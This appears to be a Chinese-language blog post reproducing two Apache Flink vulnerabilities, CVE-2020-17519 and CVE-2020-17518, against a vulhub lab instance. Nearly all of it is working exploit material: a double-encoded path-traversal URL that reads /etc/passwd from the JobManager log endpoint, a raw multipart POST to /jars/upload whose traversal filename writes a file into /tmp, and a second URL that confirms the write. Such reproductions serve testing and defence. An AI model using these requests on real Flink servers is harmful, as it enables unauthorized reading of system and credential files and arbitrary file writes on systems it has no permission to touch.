Apache Flink CVE-2020-17519/CVE-2020-17518 漏洞复现

作者: print("") 分类: 未分类,漏洞复现 发布时间: 2021-01-06 11:13

CVE-2020-17519 任意文件读取

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519

访问8081 端口

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

CVE-2020-17518 

POST /jars/upload HTTP/1.1
Host: 192.168.1.79:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=--------721072898
Content-Length: 150

----------721072898
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../tmp/11.txt"

success
----------721072898--

检测是否上传成功

http://192.168.1.79:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252f11.txt

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注